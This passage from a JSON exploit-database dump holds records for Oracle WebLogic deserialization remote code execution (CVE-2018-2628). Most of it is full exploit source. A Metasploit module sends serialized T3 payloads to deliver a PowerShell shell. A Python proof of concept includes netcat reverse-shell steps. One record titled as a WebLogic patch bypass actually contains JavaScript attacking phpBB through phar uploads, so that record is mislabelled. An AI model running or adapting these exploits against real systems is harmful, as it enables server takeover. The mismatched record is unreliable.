sock.put([data].pack('H*'))\r\n sleep(1)\r\n sock.put([data].pack('H*'))\r\n sleep(1)\r\n sock.get_once\r\n end\r\n\r\n def exploit\r\n @met_sent = []\r\n gen_resp\r\n\r\n connect\r\n vprint_status('Sending handshake...')\r\n t3_handshake\r\n\r\n build_t3_request_object\r\n\r\n start_service\r\n\r\n vprint_status('Sending payload...')\r\n send_payload_objdata\r\n\r\n # Need to wait this long to make sure we get a shell back\r\n sleep(10)\r\n end\r\nend\n\n# 0day.today [2018-08-12] #", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/30868"}, {"lastseen": "2019-03-09T04:35:39", "description": "Exploit for multiple platform in category remote exploits", "edition": 1, "published": "2019-03-08T00:00:00", "title": "Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-3245", "CVE-2018-2628"], "modified": "2019-03-08T00:00:00", "id": "1337DAY-ID-32327", "href": "https://0day.today/exploit/description/32327", "sourceData": "Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) Exploit\r\n\r\n// All greets goes to RIPS Tech\r\n// Run this JS on Attachment Settings ACP page\r\nvar plupload_salt = '';\r\nvar form_token = '';\r\nvar creation_time = '';\r\nvar filepath = 'phar://./../files/plupload/$salt_aaae9cba5fdadb1f0c384934cd20d11czip.part'; // md5('evil.zip') = aaae9cba5fdadb1f0c384934cd20d11czip\r\n// your payload here\r\nvar payload = '<?php __HALT_COMPILER(); ?>\\x0d\\x0a\\xfe\\x01\\x00\\x00\\x01\\x00\\x00\\x00\\x11\\x00\\x00\\x00\\x01'+'\\x00'.repeat(5)+'\\xc8\\x01\\x00\\x00O:31:\"GuzzleHttp\\x5cCookie\\x5cFileCookieJar\":4:{s:41:\"\\x00GuzzleHttp\\x5cCookie\\x5cFileCookieJar\\x00filename\";s:30:\"/var/www/html/phpBB3/pinfo.php\";s:52:\"\\x00GuzzleHttp\\x5cCookie\\x5cFileCookieJar\\x00storeSessionCookies\";b:1;s:36:\"\\x00GuzzleHttp\\x5cCookie\\x5cCookieJar\\x00cookies\";a:1:{i:0;O:27:\"GuzzleHttp\\x5cCookie\\x5cSetCookie\":1:{s:33:\"\\x00GuzzleHttp\\x5cCookie\\x5cSetCookie\\x00data\";a:3:{s:7:\"Expires\";i:1;s:7:\"Discard\";b:0;s:5:\"Value\";s:17:\"<?php phpinfo();#\";}}}s:39:\"\\x00GuzzleHttp\\x5cCookie\\x5cCookieJar\\x00strictMode\";N;}\\x08\\x00\\x00\\x00test.txt\\x04\\x00\\x00\\x00K>\\x10\\x5c\\x04\\x00\\x00\\x00\\x0c~\\x7f\\xd8\\xb6\\x01'+'\\x00'.repeat(6)+'test\\xa0\\x17\\xd2\\xe0R\\xcf \\xf6T\\x1d\\x01X\\x91(\\x9dD]X\\x0b>\\x02\\x00\\x00\\x00GBMB';\r\nvar byteArray = Uint8Array.from(payload, function(c){return c.codePointAt(0);});\r\nvar sid = (new URL(document.location.href)).searchParams.get('sid');\r\nvar url = '/adm/index.php';\r\nvar getparams = {\r\n 'i': 'acp_database',\r\n 'sid': sid,\r\n 'mode': 'backup'\r\n};\r\n$.get(url, getparams, function(data) {\r\n form_token = $(data).find('[name=\"form_token\"]').val();\r\n creation_time = $(data).find('[name=\"creation_time\"]').val();\r\n if(form_token && creation_time) {\r\n var posturl = '/adm/index.php?i=acp_database&sid=|&mode=backup&action=download';\r\n var postdata = {\r\n 'type': 'data',\r\n 'method': 'text',\r\n 'where': 'download',\r\n 'table[]': 'phpbb_config',\r\n 'submit': 'Submit',\r\n 'creation_time': creation_time,\r\n 'form_token': form_token\r\n }\r\n $.post(posturl.replace(\"|\", sid), postdata, function (data) {\r\n plupload_salt = data.match(/plupload_salt',\\s*'(\\w{32})/)[1];\r\n if (plupload_salt) {\r\n filepath = filepath.replace(\"$salt\", plupload_salt);\r\n var postdata = new FormData();\r\n postdata.append('name', 'evil.zip');\r\n postdata.append('chunk', 0);\r\n postdata.append('chunks', 2);\r\n postdata.append('add_file', 'Add the file');\r\n postdata.append('real_filename', 'evil.zip');\r\n // file\r\n var pharfile = new File([byteArray], 'evil.zip');\r\n postdata.append('fileupload', pharfile);\r\n jQuery.ajax({\r\n url: '/posting.php?mode=reply&f=2&t=1',\r\n data: postdata,\r\n cache: false,\r\n contentType: false,\r\n processData: false,\r\n method: 'POST',\r\n success: function(data){\r\n if (\"id\" in data) {\r\n $('#img_imagick').val(filepath).focus();\r\n $('html, body').animate({\r\n scrollTop: ($('#submit').offset().top)\r\n }, 500);\r\n }\r\n }\r\n });\r\n\r\n }\r\n }, 'text');\r\n }\r\n});\n\n# 0day.today [2019-03-09] #", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/32327"}], "exploitdb": [{"lastseen": "2018-05-24T14:18:42", "description": "Oracle Weblogic Server 10.3.6.0 / 12.1.3.0 / 12.2.1.2 / 12.2.1.3 - Deserialization Remote Command Execution. CVE-2018-2628. Remote exploit for Multiple platform", "published": "2018-04-22T00:00:00", "type": "exploitdb", "title": "Oracle Weblogic Server 10.3.6.0 / 12.1.3.0 / 12.2.1.2 / 12.2.1.3 - Deserialization Remote Command Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-2628"], "modified": "2018-04-22T00:00:00", "id": "EDB-ID:44553", "href": "https://www.exploit-db.com/exploits/44553/", "sourceData": "# -*- coding: utf-8 -*-\r\n# Oracle Weblogic Server (10.3.6.0, 12.1.3.0, 12.2.1.2, 12.2.1.3) Deserialization Remote Command Execution Vulnerability (CVE-2018-2628)\r\n#\r\n# IMPORTANT: Is provided only for educational or information purposes.\r\n#\r\n# Credit: Thanks by Liao Xinxi of NSFOCUS Security Team\r\n# Reference: http://mp.weixin.qq.com/s/nYY4zg2m2xsqT0GXa9pMGA\r\n#\r\n# How to exploit:\r\n# 1. run below command on JRMPListener host\r\n# 1) wget https://github.com/brianwrf/ysoserial/releases/download/0.0.6-pri-beta/ysoserial-0.0.6-SNAPSHOT-BETA-all.jar\r\n# 2) java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener [listen port] CommonsCollections1 [command]\r\n# e.g. java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections1 'nc -nv 10.0.0.5 4040'\r\n# 2. start a listener on attacker host\r\n# e.g. nc -nlvp 4040\r\n# 3. run this script on attacker host\r\n# 1) wget https://github.com/brianwrf/ysoserial/releases/download/0.0.6-pri-beta/ysoserial-0.0.6-SNAPSHOT-BETA-all.jar\r\n# 2) python exploit.py [victim ip] [victim port] [path to ysoserial] [JRMPListener ip] [JRMPListener port] [JRMPClient]\r\n# e.g.\r\n# a) python exploit.py 10.0.0.11 7001 ysoserial-0.0.6-SNAPSHOT-BETA-all.jar 10.0.0.5 1099 JRMPClient (Using java.rmi.registry.Registry)\r\n# b) python exploit.py 10.0.0.11 7001 ysoserial-0.0.6-SNAPSHOT-BETA-all.jar 10.0.0.5 1099 JRMPClient2 (Using java.rmi.activation.Activator)\r\n\r\nfrom __future__ import print_function\r\n\r\nimport binascii\r\nimport os\r\nimport socket\r\nimport sys\r\nimport time\r\n\r\n\r\ndef generate_payload(path_ysoserial, jrmp_listener_ip, jrmp_listener_port, jrmp_client):\r\n #generates ysoserial payload\r\n command = 'java -jar {} {} {}:{} > payload.out'.format(path_ysoserial, jrmp_client, jrmp_listener_ip, jrmp_listener_port)\r\n print(\"command: \" + command)\r\n os.system(command)\r\n bin_file = open('payload.out','rb').read()\r\n return binascii.hexlify(bin_file)\r\n\r\n\r\ndef t3_handshake(sock, server_addr):\r\n sock.connect(server_addr)\r\n sock.send('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'.decode('hex'))\r\n time.sleep(1)\r\n sock.recv(1024)\r\n print('handshake successful')\r\n\r\n\r\ndef build_t3_request_object(sock, port):\r\n data1 = '000005c3016501ffffffffffffffff0000006a0000ea600000001900937b484a56fa4a777666f581daa4f5b90e2aebfc607499b4027973720078720178720278700000000a000000030000000000000006007070707070700000000a000000030000000000000006007006fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c657400124c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271007e00034c000b696d706c56657273696f6e71007e000378707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b4c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00044c000a696d706c56656e646f7271007e00044c000b696d706c56657273696f6e71007e000478707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e50656572496e666f585474f39bc908f10200064900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463685b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b6167657371'\r\n data2 = '007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56657273696f6e71007e000578707702000078fe00fffe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c000078707750210000000000000000000d3139322e3136382e312e323237001257494e2d4147444d565155423154362e656883348cd6000000070000{0}ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c0000787077200114dc42bd07'.format('{:04x}'.format(dport))\r\n data3 = '1a7727000d3234322e323134'\r\n data4 = '2e312e32353461863d1d0000000078'\r\n for d in [data1,data2,data3,data4]:\r\n sock.send(d.decode('hex'))\r\n time.sleep(2)\r\n print('send request payload successful,recv length:%d'%(len(sock.recv(2048))))\r\n\r\n\r\ndef send_payload_objdata(sock, data):\r\n payload='056508000000010000001b0000005d010100737201787073720278700000000000000000757203787000000000787400087765626c6f67696375720478700000000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200025b42acf317f8060854e002000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200106a6176612e7574696c2e566563746f72d9977d5b803baf010300034900116361706163697479496e6372656d656e7449000c656c656d656e74436f756e745b000b656c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b78707702000078fe010000'\r\n payload+=data\r\n payload+='fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff'\r\n payload = '%s%s'%('{:08x}'.format(len(payload)/2 + 4),payload)\r\n sock.send(payload.decode('hex'))\r\n time.sleep(2)\r\n sock.send(payload.decode('hex'))\r\n res = ''\r\n try:\r\n while True:\r\n res += sock.recv(4096)\r\n time.sleep(0.1)\r\n except Exception:\r\n pass\r\n return res\r\n\r\n\r\ndef exploit(dip, dport, path_ysoserial, jrmp_listener_ip, jrmp_listener_port, jrmp_client):\r\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n sock.settimeout(65)\r\n server_addr = (dip, dport)\r\n t3_handshake(sock, server_addr)\r\n build_t3_request_object(sock, dport)\r\n payload = generate_payload(path_ysoserial, jrmp_listener_ip, jrmp_listener_port, jrmp_client)\r\n print(\"payload: \" + payload)\r\n rs=send_payload_objdata(sock, payload)\r\n print('response: ' + rs)\r\n print('exploit completed!')\r\n\r\n\r\nif __name__==\"__main__\":\r\n #check for args, print usage if incorrect\r\n if len(sys.argv) != 7:\r\n print('\\nUsage:\\nexploit.py [victim ip] [victim port] [path to ysoserial] '\r\n '[JRMPListener ip] [JRMPListener port] [JRMPClient]\\n')\r\n sys.exit()\r\n\r\n dip = sys.argv[1]\r\n dport = int(sys.argv[2])\r\n path_ysoserial = sys.argv[3]\r\n jrmp_listener_ip = sys.argv[4]\r\n jrmp_listener_port = sys.argv[5]\r\n jrmp_client = sys.argv[6]\r\n exploit(dip, dport, path_ysoserial, jrmp_listener_ip, jrmp_listener_port, jrmp_client)", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/44553/"}, {"lastseen": "2018-08-13T19:27:18", "description": "Oracle Weblogic Server - Deserialization Remote Code Execution (Metasploit). CVE-2018-2628. Remote exploit for Windows platform. Tags: Metasploit Framework (...", "published": "2018-08-13T00:00:00", "type": "exploitdb", "title": "Oracle Weblogic Server - Deserialization Remote Code Execution (Metasploit)", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-2628"], "modified": "2018-08-13T00:00:00", "id": "EDB-ID:45193", "href": "https://www.exploit-db.com/exploits/45193/", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core/exploit/powershell'\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ManualRanking\r\n\r\n include Msf::Exploit::Remote::Tcp\r\n include Msf::Exploit::Remote::TcpServer\r\n include Msf::Exploit::Powershell\r\n\r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => 'Oracle Weblogic Server Deserialization RCE',\r\n 'Description' => %q{\r\n An unauthenticated attacker with network access to the Oracle Weblogic\r\n Server T3 interface can send a serialized object to the interface to\r\n execute code on vulnerable hosts.\r\n },\r\n 'Author' =>\r\n [\r\n 'brianwrf', # EDB PoC\r\n 'Jacob Robles' # Metasploit Module\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n ['CVE', '2018-2628'],\r\n ['EDB', '44553']\r\n ],\r\n 'Privileged' => false,\r\n 'Targets' =>\r\n [\r\n [ 'Windows',\r\n {\r\n 'Platform' => ['win']\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' =>\r\n {\r\n 'RPORT' => 7001\r\n },\r\n 'DisclosureDate' => 'Apr 17 2018'))\r\n end\r\n\r\n def gen_resp\r\n pwrshl = cmd_psh_payload(payload.encoded, payload_instance.arch.first)\r\n pwrshl.gsub!(\"%COMSPEC%\", \"cmd.exe\")\r\n tmp_dat = pwrshl.each_byte.map {|b| b.to_s(16)}.join\r\n\r\n mycmd = (tmp_dat.length >> 1).to_s(16).rjust(4,'0')\r\n mycmd << tmp_dat\r\n\r\n # Response data taken from JRMPListener generated data:\r\n # java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener <lport> CommonsCollections1 'calc.exe'\r\n # Modified captured network traffic bytes. Patch in command to run\r\n @resp = '51aced0005770f02086f5ef3000001651a67984d80017372002e6a617661782e'\r\n @resp << '6d616e6167656d656e742e42616441747472696275746556616c756545787045'\r\n @resp << '7863657074696f6ed4e7daab632d46400200014c000376616c7400124c6a6176'\r\n @resp << '612f6c616e672f4f626a6563743b70787200136a6176612e6c616e672e457863'\r\n @resp << '657074696f6ed0fd1f3e1a3b1cc402000070787200136a6176612e6c616e672e'\r\n @resp << '5468726f7761626c65d5c635273977b8cb0300044c000563617573657400154c'\r\n @resp << '6a6176612f6c616e672f5468726f7761626c653b4c000d64657461696c4d6573'\r\n @resp << '736167657400124c6a6176612f6c616e672f537472696e673b5b000a73746163'\r\n @resp << '6b547261636574001e5b4c6a6176612f6c616e672f537461636b547261636545'\r\n @resp << '6c656d656e743b4c001473757070726573736564457863657074696f6e737400'\r\n @resp << '104c6a6176612f7574696c2f4c6973743b70787071007e0008707572001e5b4c'\r\n @resp << '6a6176612e6c616e672e537461636b5472616365456c656d656e743b02462a3c'\r\n @resp << '3cfd2239020000707870000000047372001b6a6176612e6c616e672e53746163'\r\n @resp << '6b5472616365456c656d656e746109c59a2636dd8502000449000a6c696e654e'\r\n @resp << '756d6265724c000e6465636c6172696e67436c61737371007e00054c00086669'\r\n @resp << '6c654e616d6571007e00054c000a6d6574686f644e616d6571007e0005707870'\r\n @resp << '0000011b74001e79736f73657269616c2e6578706c6f69742e4a524d504c6973'\r\n @resp << '74656e65727400114a524d504c697374656e65722e6a617661740006646f4361'\r\n @resp << '6c6c7371007e000b000000e071007e000d71007e000e740009646f4d65737361'\r\n @resp << '67657371007e000b000000ab71007e000d71007e000e74000372756e7371007e'\r\n @resp << '000b0000007771007e000d71007e000e7400046d61696e737200266a6176612e'\r\n @resp << '7574696c2e436f6c6c656374696f6e7324556e6d6f6469666961626c654c6973'\r\n @resp << '74fc0f2531b5ec8e100200014c00046c69737471007e0007707872002c6a6176'\r\n @resp << '612e7574696c2e436f6c6c656374696f6e7324556e6d6f6469666961626c6543'\r\n @resp << '6f6c6c656374696f6e19420080cb5ef71e0200014c0001637400164c6a617661'\r\n @resp << '2f7574696c2f436f6c6c656374696f6e3b707870737200136a6176612e757469'\r\n @resp << '6c2e41727261794c6973747881d21d99c7619d03000149000473697a65707870'\r\n @resp << '000000007704000000007871007e001b787372003273756e2e7265666c656374'\r\n @resp << '2e616e6e6f746174696f6e2e416e6e6f746174696f6e496e766f636174696f6e'\r\n @resp << '48616e646c657255caf50f15cb7ea50200024c000c6d656d62657256616c7565'\r\n @resp << '7374000f4c6a6176612f7574696c2f4d61703b4c0004747970657400114c6a61'\r\n @resp << '76612f6c616e672f436c6173733b707870737d00000001000d6a6176612e7574'\r\n @resp << '696c2e4d617074001066696c653a2f746d702f73732e6a6172787200176a6176'\r\n @resp << '612e6c616e672e7265666c6563742e50726f7879e127da20cc1043cb0200014c'\r\n @resp << '0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174'\r\n @resp << '696f6e48616e646c65723b7078707371007e001c7372002a6f72672e61706163'\r\n @resp << '68652e636f6d6d6f6e732e636f6c6c656374696f6e732e6d61702e4c617a794d'\r\n @resp << '61706ee594829e7910940300014c0007666163746f727974002c4c6f72672f61'\r\n @resp << '70616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e7366'\r\n @resp << '6f726d65723b74001066696c653a2f746d702f73732e6a617278707372003a6f'\r\n @resp << '72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6675'\r\n @resp << '6e63746f72732e436861696e65645472616e73666f726d657230c797ec287a97'\r\n @resp << '040200015b000d695472616e73666f726d65727374002d5b4c6f72672f617061'\r\n @resp << '6368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f72'\r\n @resp << '6d65723b74001066696c653a2f746d702f73732e6a617278707572002d5b4c6f'\r\n @resp << '72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e5472'\r\n @resp << '616e73666f726d65723bbd562af1d834189902000074001066696c653a2f746d'\r\n @resp << '702f73732e6a61727870000000057372003b6f72672e6170616368652e636f6d'\r\n @resp << '6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436f6e737461'\r\n @resp << '6e745472616e73666f726d6572587690114102b1940200014c000969436f6e73'\r\n @resp << '74616e7471007e000174001066696c653a2f746d702f73732e6a617278707672'\r\n @resp << '00116a6176612e6c616e672e52756e74696d6500000000000000000000007078'\r\n @resp << '707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c65637469'\r\n @resp << '6f6e732e66756e63746f72732e496e766f6b65725472616e73666f726d657287'\r\n @resp << 'e8ff6b7b7cce380200035b000569417267737400135b4c6a6176612f6c616e67'\r\n @resp << '2f4f626a6563743b4c000b694d6574686f644e616d6571007e00055b000b6950'\r\n @resp << '6172616d54797065737400125b4c6a6176612f6c616e672f436c6173733b7400'\r\n @resp << '1066696c653a2f746d702f73732e6a61727870757200135b4c6a6176612e6c61'\r\n @resp << '6e672e4f626a6563743b90ce589f1073296c0200007078700000000274000a67'\r\n @resp << '657452756e74696d65757200125b4c6a6176612e6c616e672e436c6173733bab'\r\n @resp << '16d7aecbcd5a99020000707870000000007400096765744d6574686f64757100'\r\n @resp << '7e003e00000002767200106a6176612e6c616e672e537472696e67a0f0a4387a'\r\n @resp << '3bb3420200007078707671007e003e7371007e00367571007e003b0000000270'\r\n @resp << '7571007e003b00000000740006696e766f6b657571007e003e00000002767200'\r\n @resp << '106a6176612e6c616e672e4f626a656374000000000000000000000070787076'\r\n @resp << '71007e003b7371007e0036757200135b4c6a6176612e6c616e672e537472696e'\r\n @resp << '673badd256e7e91d7b470200007078700000000174'\r\n\r\n @resp << mycmd\r\n\r\n @resp << '74'\r\n @resp << '0004657865637571007e003e0000000171007e00437371007e0031737200116a'\r\n @resp << '6176612e6c616e672e496e746567657212e2a0a4f78187380200014900057661'\r\n @resp << '6c756570787200106a6176612e6c616e672e4e756d62657286ac951d0b94e08b'\r\n @resp << '02000070787000000001737200116a6176612e7574696c2e486173684d617005'\r\n @resp << '07dac1c31660d103000246000a6c6f6164466163746f72490009746872657368'\r\n @resp << '6f6c647078703f40000000000000770800000010000000007878767200126a61'\r\n @resp << '76612e6c616e672e4f7665727269646500000000000000000000007078707100'\r\n @resp << '7e005a'\r\n end\r\n\r\n\r\n def on_client_connect(client)\r\n # Make sure to only sent one meterpreter payload to a host.\r\n # During testing the remote host called back up to 11 times\r\n # (or as long as the server was listening).\r\n vprint_status(\"Comparing host: #{client.peerhost}\")\r\n if @met_sent.include?(client.peerhost) then return end\r\n @met_sent << client.peerhost\r\n\r\n vprint_status(\"met_sent: #{@met_sent}\")\r\n\r\n # Response format determined by watching network traffic\r\n # generated by EDB PoC\r\n accept_conn = '4e00'\r\n raccept_conn = client.peerhost.each_byte.map {|b| b.to_s(16)}.join\r\n accept_conn << (raccept_conn.length >> 1).to_s(16).rjust(2,'0')\r\n accept_conn << raccept_conn\r\n accept_conn << '0000'\r\n accept_conn << client.peerport.to_s(16).rjust(4,'0')\r\n\r\n client.put([accept_conn].pack('H*'))\r\n client.put([@resp].pack('H*'))\r\n end\r\n\r\n def t3_handshake\r\n shake = '74332031322e322e310a41533a323535'\r\n shake << '0a484c3a31390a4d533a313030303030'\r\n shake << '30300a0a'\r\n\r\n sock.put([shake].pack('H*'))\r\n sleep(1)\r\n sock.get_once\r\n end\r\n\r\n def build_t3_request_object\r\n # data block is from EDB PoC\r\n data = '000005c3016501ffffffffffffffff0000006a0000ea600000001900937b484a'\r\n data << '56fa4a777666f581daa4f5b90e2aebfc607499b4027973720078720178720278'\r\n data << '700000000a000000030000000000000006007070707070700000000a00000003'\r\n data << '0000000000000006007006fe010000aced00057372001d7765626c6f6769632e'\r\n data << '726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078'\r\n data << '707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e506163'\r\n data << '6b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d69'\r\n data << '6e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b'\r\n data << '5a000e74656d706f7261727950617463684c0009696d706c5469746c65740012'\r\n data << '4c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271'\r\n data << '007e00034c000b696d706c56657273696f6e71007e000378707702000078fe01'\r\n data << '0000aced00057372001d7765626c6f6769632e726a766d2e436c617373546162'\r\n data << '6c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e'\r\n data << '636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f9722455164'\r\n data << '52463e0200035b00087061636b616765737400275b4c7765626c6f6769632f63'\r\n data << '6f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b4c000e7265'\r\n data << '6c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e67'\r\n data << '3b5b001276657273696f6e496e666f417342797465737400025b427872002477'\r\n data << '65626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b61676549'\r\n data << '6e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f724900'\r\n data << '0c726f6c6c696e67506174636849000b736572766963655061636b5a000e7465'\r\n data << '6d706f7261727950617463684c0009696d706c5469746c6571007e00044c000a'\r\n data << '696d706c56656e646f7271007e00044c000b696d706c56657273696f6e71007e'\r\n data << '000478707702000078fe010000aced00057372001d7765626c6f6769632e726a'\r\n data << '766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c0000787072'\r\n data << '00217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5065657249'\r\n data << '6e666f585474f39bc908f10200064900056d616a6f724900056d696e6f724900'\r\n data << '0c726f6c6c696e67506174636849000b736572766963655061636b5a000e7465'\r\n data << '6d706f7261727950617463685b00087061636b616765737400275b4c7765626c'\r\n data << '6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f'\r\n data << '3b787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5665'\r\n data << '7273696f6e496e666f972245516452463e0200035b00087061636b6167657371'\r\n data << '007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c61'\r\n data << '6e672f537472696e673b5b001276657273696f6e496e666f4173427974657374'\r\n data << '00025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c'\r\n data << '2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f7249'\r\n data << '00056d696e6f7249000c726f6c6c696e67506174636849000b73657276696365'\r\n data << '5061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c'\r\n data << '6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56'\r\n data << '657273696f6e71007e000578707702000078fe00fffe010000aced0005737200'\r\n data << '137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c000078'\r\n data << '707750210000000000000000000d3139322e3136382e312e323237001257494e'\r\n data << '2d4147444d565155423154362e656883348cd6000000070000'\r\n\r\n data << rport.to_s(16).rjust(4, '0')\r\n\r\n data << 'ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced00'\r\n data << '05737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a'\r\n data << '0c0000787077200114dc42bd071a7727000d3234322e3231342e312e32353461'\r\n data << '863d1d0000000078'\r\n\r\n sock.put([data].pack('H*'))\r\n sleep(2)\r\n sock.get_once\r\n end\r\n\r\n def send_payload_objdata\r\n # JRMPClient2 payload generated from EDB PoC:\r\n # python exploit.py <rhost> <rport> ysoserial-0.0.6-SNAPSHOT-BETA-all.jar <lhost> <lport> JRMPClient2\r\n # Patch in srvhost and srvport\r\n payload = '056508000000010000001b0000005d0101007372017870737202787000000000'\r\n payload << '00000000757203787000000000787400087765626c6f67696375720478700000'\r\n payload << '000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000aced'\r\n payload << '00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e'\r\n payload << '7472792f52658157f4f9ed0c000078707200025b42acf317f8060854e0020000'\r\n payload << '78707702000078fe010000aced00057372001d7765626c6f6769632e726a766d'\r\n payload << '2e436c6173735461626c65456e7472792f52658157f4f9ed0c00007870720013'\r\n payload << '5b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c0200007870'\r\n payload << '7702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e43'\r\n payload << '6c6173735461626c65456e7472792f52658157f4f9ed0c000078707200106a61'\r\n payload << '76612e7574696c2e566563746f72d9977d5b803baf0103000349001163617061'\r\n payload << '63697479496e6372656d656e7449000c656c656d656e74436f756e745b000b65'\r\n payload << '6c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b'\r\n payload << '78707702000078fe010000'\r\n\r\n # Data\r\n payload << 'aced0005737d00000001001d6a6176612e726d692e61637469766174696f6e2e'\r\n payload << 